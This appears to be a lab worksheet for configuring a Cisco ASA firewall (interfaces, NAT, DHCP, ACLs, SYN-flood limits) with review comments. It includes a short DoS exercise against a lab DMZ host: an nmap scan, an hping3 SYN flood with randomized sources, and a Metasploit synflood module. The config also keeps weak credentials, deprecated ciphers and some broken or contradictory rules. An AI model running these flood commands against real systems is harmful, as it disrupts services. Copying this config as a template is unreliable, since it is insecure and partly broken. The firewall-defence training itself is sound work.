- en
- conf t
- hostname ASA
- domain-name team3.lab
- username root password team3 privilege 15
- crypto key generate rsa general-key modulus 2048
- write
- # Configure the management (control) interface
- show interface ip brief
- int Management0/0
- ip address 192.168.56.253 255.255.255.0
- no shutdown
- nameif Management
- management-only
- security-level 100
- exit
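- # Configure the service (DMZ) interface
- # NOTE(review): no security-level is set here, so the ASA default for a name other than "inside" (0) applies and dmz ends up at the same level as outside; an intermediate value such as 50 is the usual choice.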
- interface GigabitEthernet0/1
- nameif dmz
- ip address 192.168.255.253 255.255.255.0
- no shutdown
- exit
- write
- # Configure the inside network interface
- interface GigabitEthernet0/0
- nameif inside
- ip address 192.168.100.253 255.255.255.0
- no shutdown
- exit
- write
- # Configure the outside network interface
- interface GigabitEthernet0/2
- nameif outside
- ip address 192.168.133.253 255.255.255.0
- no shutdown
- exit
- write
- # Configure SSH (local user database, reachable from the management subnet only)
- aaa authentication ssh console LOCAL
- ssh 192.168.56.0 255.255.255.0 Management
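- # Update firmware / ASDM image and enable HTTPS management access
- # NOTE(review): the "ssl encryption" list below still offers rc4-sha1 and 3des-sha1, both deprecated; keep only the AES suites (or stronger ones if the image supports them).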
- copy tftp: flash:
- http server enable
- http 192.168.56.0 255.255.255.0 Management
- ssl encryption rc4-sha1 aes128-sha1 aes256-sha1 3des-sha1
- conf t
- asdm image flash:/asdm-762-150.bin
- exit
- write
- # Update anyconnect
- copy tftp: flash:
- 192.168.56.1
- anyconnect-win-4.4.02039.pkg
- webvpn
- anyconnect image flash:/anyconnect-win-4.4.02039.pkg
- anyconnect enable
- write
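- # DHCP for the inside, dmz and outside zones
- # NOTE(review): the third scope serves leases on the outside interface, which is only reasonable in an isolated lab.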
- dhcpd address 192.168.100.101-192.168.100.200 inside
- dhcpd dns 8.8.8.8 8.8.4.4 interface inside
- dhcpd lease 28880 interface inside
- dhcpd domain team3.lab interface inside
- dhcpd option 3 ip 192.168.100.253 interface inside
- dhcpd enable inside
- dhcpd address 192.168.255.101-192.168.255.200 dmz
- dhcpd dns 8.8.8.8 8.8.4.4 interface dmz
- dhcpd lease 28880 interface dmz
- dhcpd domain team3.lab interface dmz
- dhcpd option 3 ip 192.168.255.253 interface dmz
- dhcpd enable dmz
- dhcpd address 192.168.133.100-192.168.133.160 outside
- dhcpd dns 8.8.8.8 8.8.4.4 interface outside
- dhcpd lease 28880 interface outside
- dhcpd domain team3.lab interface outside
- dhcpd option 3 ip 192.168.133.253 interface outside
- dhcpd enable outside
- # Create network objects
- object network PUBLIC_IP
- range 192.168.133.100 192.168.133.160
- exit
- object network DMZ
- subnet 192.168.255.0 255.255.255.0
- exit
- object network INTERNAL
- subnet 192.168.100.0 255.255.255.0
- exit
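- # Set up dynamic NAT (PAT) for the inside and dmz zones, and for outside clients entering the dmz
- # NOTE(review): "nat (outside,dmz) dynamic interface" rewrites every outside source address to the dmz interface address, so DMZ server logs will not show real client IPs.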
- object network INTERNAL
- nat (inside,outside) dynamic interface
- exit
- object network DMZ
- nat (dmz,outside) dynamic interface
- exit
- object network PUBLIC_IP
- nat (outside,dmz) dynamic interface
- exit
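- # NAT for the DMZ web server
- # NOTE(review): WEB-SERVER is configured twice below; an object carries a single nat statement, so the later dynamic rule presumably replaces the static port 80 forward - verify with "show run nat".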
- object network WEB-SERVER
- host 192.168.255.129
- nat (dmz,outside) static interface service tcp 80 80
- exit
- object network WEB-SERVER
- host 192.168.255.129
- nat (dmz,outside) dynamic interface
- exit
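- # DoS test against the lab DMZ server 192.168.255.129 (one sending host with randomized source addresses, not a distributed attack)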
- -- Scan for open ports on the server
- nmap -Pn -sS 192.168.255.129
- Result: port 23/tcp is shown as open
- -- Attack
- hping3 -S -p 80 --flood --rand-source 192.168.255.129
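- # Create access lists for the zones and for host 192.168.255.129
- # NOTE(review): each zone ACL starts with "permit ip <subnet> any", which already covers the icmp and tcp entries after it, so these lists filter nothing beyond the source subnet.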
- access-list inside2outside permit ip 192.168.100.0 255.255.255.0 any
- access-list inside2outside permit icmp 192.168.100.0 255.255.255.0 any
- access-group inside2outside in interface inside
- access-list dmz2outside permit ip 192.168.255.0 255.255.255.0 any
- access-list dmz2outside permit icmp 192.168.255.0 255.255.255.0 any
- access-list dmz2outside permit tcp 192.168.255.0 255.255.255.0 any
- access-group dmz2outside in interface dmz
- access-list outside2dmz permit ip 192.168.133.0 255.255.255.0 any
- access-list outside2dmz permit icmp 192.168.133.0 255.255.255.0 any
- access-list outside2dmz permit tcp 192.168.133.0 255.255.255.0 any
- access-group outside2dmz in interface outside
- access-list syn permit tcp any host 192.168.255.129 eq telnet
- access-list syn permit tcp any host 192.168.255.129 eq ssh
- access-list syn permit tcp any host 192.168.255.129 eq http
- access-list syn permit tcp any host 192.168.255.129 eq https
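- # Firewall defence: limit half-open (embryonic) TCP connections to the server
- # NOTE(review): the class-map defined below is "syn" but both policy-maps reference class "dos", which is not defined anywhere on this page; the first access-list line also lacks the "host" keyword used in the lines above it.
- # NOTE(review): "access-group syn in interface outside" further down takes the place of outside2dmz, since an interface holds one ACL per direction, and policy-map "syn" is never attached with a service-policy on this page.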
- access-list syn permit tcp any 192.168.255.129 eq 23
- class-map syn
- match access-list syn
- show run service-policy
- policy-map global_policy
- class dos
- set connection embryonic-conn-max 100
- end
- show run policy-map
- show conn count
- policy-map syn
- class dos
- set connection embryonic-conn-max 10000
- conf t
- access-list syn permit tcp any host 13.0.0.1 eq telnet
- access-list syn permit tcp any host 13.0.0.1 eq ssh
- access-list syn permit tcp any host 13.0.0.1 eq http
- access-list syn permit tcp any host 13.0.0.1 eq https
- access-list syn permit tcp any host 13.0.0.1
- write
- access-group syn in interface outside
- show resource usage all
- show threat-detection rate
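- # Configure the service (DMZ) host
- # NOTE(review): in the ASA lines that follow, "access-list To_server permit tcp any any" makes the class match all TCP traffic, so the embryonic-conn-max 5 limit is not confined to the DMZ server.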
- ifconfig eth0 192.168.255.129 netmask 255.255.255.0
- route add default gw 192.168.255.253 eth0
- msfconsole
- use auxiliary/dos/tcp/synflood
- show options
- set RHOST 192.168.255.129
- exploit
- access-list To_server permit tcp any host 192.168.255.101
- access-list To_server permit tcp any any
- class-map Traffic_to_dmz_server
- match access-list To_server
- exit
- policy-map global_policy
- class Traffic_to_dmz_server
- set connection embryonic-conn-max 5
- exit
- exit
- access-list To_server permit tcp any host 192.168.255.101
- access-list To_server permit tcp any any
- class-map Traffic_to_dmz
- match access-list outside2dmz
- exit
- policy-map global_policy
- class Traffic_to_dmz
- set connection embryonic-conn-max 5
- exit
- exit
- class-map outside2dmz
- match access-list outside2dmz
- policy-map global_policy
- class outside2dmz
- # Attack and defence
- -- Start the web service (runs as root and serves the current directory; lab use only)
- sudo python -m SimpleHTTPServer 80
- -- Scan to confirm port 80 is open
- nmap -Pn -sS -p 80 192.168.255.129
- --
- hping3 -S -p 80 --flood --rand-source 192.168.255.129
- class outside2dmz